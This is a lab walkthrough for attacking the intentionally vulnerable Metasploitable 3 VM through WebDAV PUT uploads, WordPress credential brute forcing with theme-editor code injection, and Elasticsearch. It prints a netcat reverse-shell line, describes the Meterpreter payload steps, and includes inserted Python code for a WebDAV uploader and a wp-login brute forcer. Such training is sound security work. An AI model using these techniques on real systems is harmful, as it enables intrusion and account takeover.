Metasploitable 3 Windows Walkthrough: Part X

Exploiting Port 8585 – WebDAV

Port 8585 serves more than one application on this single port: a WebDAV share and, further down in this post, a WordPress site.

Services running on Metasploitable 3 port 8585

Web Distributed Authoring and Versioning (WebDAV) is an extension of HTTP that lets clients author web content remotely: create, upload, move and delete files on the server. On Metasploitable3 the uploads directory looks promising, and for now it is completely empty:

The uploads directory

Enumerating WebDAV using dirb

dirb is a web content scanner that brute forces directory and file names on a web server from a wordlist (not to be confused with OWASP DirBuster, a separate Java tool with the same purpose).

Enumerating with dirb

Enumerating with dirb

Now you can use several methods to find out whether you are allowed to upload files to this directory with the HTTP PUT method: an OPTIONS request lists the methods the server advertises for the path, and a test PUT proves whether the server really accepts them.

Enumerating WebDAV using Nmap

Enumerating with nmap

Enumerating with nmap

As you can see, the web server lets you upload files to the uploads directory with PUT, and even delete them again with DELETE.

Enumerating WebDAV using Nikto

You can also use this web vulnerability scanner to identify features of the web server. If the HTTP PUT method is enabled, Nikto reports it as follows:

Enumerating with Nikto

The last line of the Nikto output indicates that the uploads directory allows uploading files using HTTP PUT.

Enumerating WebDAV using Metasploit

Using Metasploit you can also enumerate WebDAV.

Enumerating WebDAV with Metasploit

As you can see, the uploads directory is writable and a number of different file extensions can be uploaded there, including server-side script types.

Exploiting WebDAV

Uploading a payload to WebDAV

Now that you know you can upload files to the server, the next step is to create a PHP Meterpreter reverse shell script to deploy to the web server. Create the script with these parameters (the address and port your listener will wait on):

  • Kali IP: 172.16.1.6
  • Kali port: 5555

Creating a payload with msfvenom

Now set up a listener to receive the incoming connection, choosing the same payload, LHOST and LPORT you gave msfvenom:

Starting a Metasploit listener

Now you have several options for deploying the payload to the target machine.

Exploiting WebDAV using Nmap

Nmap has a script, http-put, written exactly to take advantage of the HTTP PUT method; it takes the remote path and the local file to upload as script arguments. Because port 8585 is not listed as an HTTP service port in Nmap's services file, you must run a service scan with the -sV flag. Otherwise Nmap will not recognise the port as HTTP, the script will not run and upload the file, and the output will only show an open port with an unknown service.

Uploading the payload with Nmap

Now, if you browse the uploads directory and click on the payload.php file, the server executes it and you get a Meterpreter shell:

Executing the payload

Meterpreter shell

This is a low-privilege shell, running as the account the web server uses, but it is a start.

Before you try the other deployment methods, close the Meterpreter session and remove the previous payload from the WebDAV server with an HTTP DELETE request sent by curl:

Deleting the payload with curl

Exploiting WebDAV using Metasploit

You can also use the Metasploit auxiliary module auxiliary/scanner/http/http_put to upload a file to the uploads web directory. Use the previously created payload:

Uploading the payload with Metasploit

Metasploit reports that the upload has failed, but when you check the uploads directory on the web server you can see that the file did go through. The module decides success from the HTTP status code the server returns, so an unexpected code is reported as a failure even though the file was written; always verify by listing the directory or requesting the file directly.

Executing the payload

Set up the same listener as before and repeat the procedure of browsing to the payload on the target server and clicking it.

Meterpreter shell

Exploiting WebDAV using curl

You can also upload the payload with curl, which sends the file in an HTTP PUT request:

Uploading the payload with curl

Exploiting WebDAV using cadaver

Finally, you can also use cadaver, a command-line WebDAV client, to upload the file:

Uploading the payload with cadaver
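The write check, the PUT upload and the DELETE clean-up that the nmap, curl and cadaver steps above perform by hand, as one added example. This code is not from the original post or from the Metasploitable3 project; pointed at a real target it only needs the base URL and the directory, and here a constructed in-memory stub plays the part of the /uploads directory so it runs offline. The stub's behaviour (201 on first PUT, 204 on overwrite and delete) is an assumption, not the real server's.

```python
"""Added example: probe a WebDAV directory for write access, then upload
and remove a file with PUT and DELETE. Not from the original post."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import urlsplit


class _UploadsStub(BaseHTTPRequestHandler):
    """Constructed stand-in for the /uploads WebDAV directory: an in-memory
    store honouring OPTIONS, PUT, GET and DELETE (assumption, not the target)."""
    store = {}

    def log_message(self, *args):  # keep the example quiet
        pass

    def _reply(self, status, body=b"", extra=None):
        self.send_response(status)
        for name, value in (extra or {}).items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if body:
            self.wfile.write(body)

    def do_OPTIONS(self):
        self._reply(200, extra={"Allow": "OPTIONS, GET, HEAD, PUT, DELETE, PROPFIND",
                                "DAV": "1,2"})

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", 0))
        created = self.path not in self.store
        self.store[self.path] = self.rfile.read(length)
        self._reply(201 if created else 204)

    def do_GET(self):
        body = self.store.get(self.path)
        if body is None:
            self._reply(404)
        else:
            self._reply(200, body)

    def do_DELETE(self):
        self._reply(404 if self.store.pop(self.path, None) is None else 204)


def _request(base_url, method, path, body=None, headers=None):
    """One HTTP request on a fresh connection; returns (status, headers, body)."""
    u = urlsplit(base_url)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=5)
    try:
        conn.request(method, path, body=body, headers=headers or {})
        resp = conn.getresponse()
        return resp.status, resp.headers, resp.read()
    finally:
        conn.close()


def allowed_methods(base_url, directory):
    """Methods the server advertises for `directory` in its OPTIONS reply."""
    _, headers, _ = _request(base_url, "OPTIONS", directory)
    allow = headers.get("Allow", "")
    return {m.strip().upper() for m in allow.split(",") if m.strip()}


def upload_file(base_url, remote_path, data, content_type="application/octet-stream"):
    """PUT `data` to `remote_path`; returns the HTTP status (201/204 mean stored)."""
    status, _, _ = _request(base_url, "PUT", remote_path, body=data,
                            headers={"Content-Type": content_type})
    return status


def delete_file(base_url, remote_path):
    """DELETE `remote_path`; returns the HTTP status (200/204 mean removed)."""
    status, _, _ = _request(base_url, "DELETE", remote_path)
    return status


def webdav_write_check(base_url, directory, marker=b"webdav write probe\n"):
    """Prove write access safely: advertised methods first, then a harmless
    .txt marker that is uploaded, read back and deleted again."""
    directory = directory.rstrip("/") + "/"
    probe = directory + ".write_probe.txt"  # .txt, so the server never executes it
    result = {"advertises_put": "PUT" in allowed_methods(base_url, directory),
              "put_status": upload_file(base_url, probe, marker, "text/plain")}
    result["writable"] = result["put_status"] in (200, 201, 204)
    if result["writable"]:
        _, _, echoed = _request(base_url, "GET", probe)
        result["readback_ok"] = echoed == marker
        result["delete_status"] = delete_file(base_url, probe)
        result["deletable"] = result["delete_status"] in (200, 204)
    return result


def start_webdav_stub():
    """Start the constructed stub on a free loopback port; returns (server, base_url)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _UploadsStub)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


if __name__ == "__main__":
    server, base = start_webdav_stub()  # against a real target use http://<target>:8585
    print(webdav_write_check(base, "/uploads/"))
    print("upload:", upload_file(base, "/uploads/payload.php", b"<?php phpinfo(); ?>"))
    print("delete:", delete_file(base, "/uploads/payload.php"))
    server.shutdown()
```

The probe deliberately uses a .txt marker rather than a script: it proves the directory is writable without executing anything on the target, and it is removed as soon as it has been read back, which is the same clean-up the curl DELETE step performs on the real payload.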

Exploiting Port 8585 – WordPress

From the start page, click the wordpress link under Your Projects to open the WordPress site running on the target server.

Metasploitable 3 WordPress website

The link to the login page takes you to /wordpress/wp-login.php.

WordPress login page

You already have the credentials because you cracked the hashes earlier, remember? Forget about that for now and try to obtain them again.

Brute forcing WordPress using Nmap

Use your customised wordlists to speed up the process; Nmap's http-wordpress-brute script takes them through the userdb and passdb script arguments.

Brute forcing WordPress with Nmap

You have found four valid sets of credentials.

Brute forcing WordPress using Metasploit

Brute forcing WordPress with Metasploit

Brute forcing WordPress using WPScan

WPScan is a powerful WordPress scanner that can also brute force logins to a WordPress site:

Brute forcing WordPress with WPScan

Brute forcing WordPress with WPScan
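What the three brute forcers above have in common is how they tell a good password from a bad one, and that is worth seeing in code. The added example below is mine, not from the original post or from WPScan, Nmap or Metasploit: WordPress answers a correct wp-login.php POST with a 302 redirect to wp-admin and a wordpress_logged_in_* session cookie, and a wrong one with a 200 page carrying the login_error div. A constructed stub that reproduces just those two responses stands in for the Metasploitable3 site so the code runs offline; its credential table (admin/sploit and vagrant/vagrant, the two pairs the post uses later) is an assumption, and a real run would simply point at http://<target>:8585.

```python
"""Added example: a minimal wp-login.php brute forcer with the same success
test WPScan and the Nmap/Metasploit modules rely on. Not from the post."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed stub accounts (assumption): the post uses these two pairs.
STUB_USERS = {"admin": "sploit", "vagrant": "vagrant"}


class _WpLoginStub(BaseHTTPRequestHandler):
    """Reproduces the two replies wp-login.php gives (simplified assumption)."""

    def log_message(self, *args):
        pass

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        user = form.get("log", [""])[0]
        password = form.get("pwd", [""])[0]
        if self.path.endswith("/wp-login.php") and STUB_USERS.get(user) == password:
            # Success: redirect to the dashboard and set the session cookie.
            self.send_response(302)
            self.send_header("Location", "/wordpress/wp-admin/")
            self.send_header("Set-Cookie",
                             "wordpress_logged_in_stub=%s|stub; path=/wordpress/" % user)
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        # Failure: the login form again, with the error div.
        body = b'<div id="login_error">Error: incorrect username or password.</div>'
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def wp_login(base_url, user, password, login_path="/wordpress/wp-login.php"):
    """One login attempt; True when WordPress redirects and sets the session cookie."""
    u = urlsplit(base_url)
    form = urlencode({"log": user, "pwd": password, "wp-submit": "Log In",
                      "redirect_to": "/wordpress/wp-admin/", "testcookie": "1"})
    headers = {"Content-Type": "application/x-www-form-urlencoded",
               # wp-login.php rejects a POST carrying testcookie=1 when the test
               # cookie from the login form is missing, so send it along.
               "Cookie": "wordpress_test_cookie=WP+Cookie+check"}
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=5)
    try:
        conn.request("POST", login_path, body=form, headers=headers)
        resp = conn.getresponse()
        resp.read()
        cookies = resp.headers.get_all("Set-Cookie") or []
        return resp.status == 302 and any(c.startswith("wordpress_logged_in_")
                                          for c in cookies)
    finally:
        conn.close()


def brute_force(base_url, users, passwords, **kw):
    """Try every password for every user, stopping at the first hit per user."""
    found = []
    for user in users:
        for password in passwords:
            if wp_login(base_url, user, password, **kw):
                found.append((user, password))
                break
    return found


def start_wp_stub():
    """Start the constructed stub on a free loopback port; returns (server, base_url)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _WpLoginStub)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


if __name__ == "__main__":
    server, base = start_wp_stub()  # against a real target use http://<target>:8585
    print(brute_force(base, ["admin", "vagrant", "nobody"], ["password", "vagrant", "sploit"]))
    server.shutdown()
```

Keying success off the redirect plus the wordpress_logged_in_ cookie, rather than off the absence of the error text, keeps the check honest when a site customises its error messages; on a production site the same loop would also have to cope with login lockout plugins and rate limiting, which the lab target does not have.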

Now, with a valid login, you can access the admin page:

WordPress admin page

Try to get as much information as possible about your target:

Enumerating WordPress using Nmap

Enumerating WordPress with Nmap

Important information: the installed plugins...

Enumerating WordPress with Nmap

NOTE: Pay attention to the syntax of the NSE scripts: their arguments are passed with --script-args and must be prefixed with the script's own name (for example http-wordpress-enum.type).

Enumerating WordPress using WPScan

WPScan is the reference tool when it comes to gathering information about a WordPress site:

Enumerating WordPress with WPScan

Enumerating WordPress with WPScan

Enumerating WordPress using Metasploit

The Metasploit module auxiliary/scanner/http/wordpress_login_enum first enumerates the existing users and then checks them for valid credentials.

Enumerating WordPress with Metasploit

Exploiting WordPress

You can log in to the website, but what you want is a shell, right? The WordPress admin interface offers no plain file upload for arbitrary PHP, but an administrator can edit the PHP files of the active theme through the built-in theme editor. The editor is available only while the DISALLOW_FILE_EDIT constant is not set in wp-config.php, which is the default, so its presence is itself a finding worth recording.

Log in to WordPress with either admin/sploit or vagrant/vagrant and open Appearance > Editor.

Accessing the WordPress Editor

On the right side, select a PHP file that runs on every page load, preferably header.php.

Selecting the header.php script

You will see the PHP code for that page:

Header.php code

Exploiting WordPress using Metasploit

To open a Meterpreter shell, create a suitable PHP payload with msfvenom:

Creating a payload

Open the generated payload and adjust the code: uncomment the opening PHP tag at the beginning and add the proper closing PHP tag at the end, so the block is valid PHP once it is pasted into the theme file:

Adjusting the payload's PHP code

Now insert this code at the top of the header.php code editor:

Inserting the payload code

Press the Update File button.

Saving the altered code

Now, set up a listener on the Kali machine, ready to receive the incoming connection:

Starting a Metasploit listener

Go back to your browser and reload the WordPress home page:

Reloading the WordPress page

And you have a shell on the target machine.

Meterpreter shell

Exploiting WordPress using Netcat

If the target machine has Netcat or a similar tool installed, it can be used to open a simple reverse shell without a Meterpreter payload.

Add the following code to the page, using Kali's IP and listener port:

<?php echo shell_exec("nc.exe 172.16.1.6 5555 -e cmd.exe"); ?>

Adding the command to open a reverse shell

Press the Update File button.

Saving the altered code

Now set up a Netcat listener on Kali:

Starting a Netcat listener

Now, reloading the WordPress home page in the browser runs the Netcat (or equivalent) command and a reverse connection to Kali is created. Because shell_exec waits for the command to finish, the page request stays pending for as long as the shell is open; that is expected.

Exploiting Port 9200 – Elasticsearch

Elasticsearch is an open source, real-time, distributed full-text search and analytics engine, and older releases are known to have a couple of remote code execution vulnerabilities. Start by accessing Metasploitable3's IP address on port 9200, where the root document reports the node name and the version:

Elasticsearch start page

Enumerating Elasticsearch using Metasploit

There is a Metasploit module to get information about the service:

Enumerating Elasticsearch with Metasploit

You can even retrieve files from the target machine:

Enumerating Elasticsearch with Metasploit

Exploiting Elasticsearch using Metasploit

Metasploit also has a module that exploits a vulnerability present in this version (1.1.1) of the service:

Exploiting Elasticsearch with Metasploit

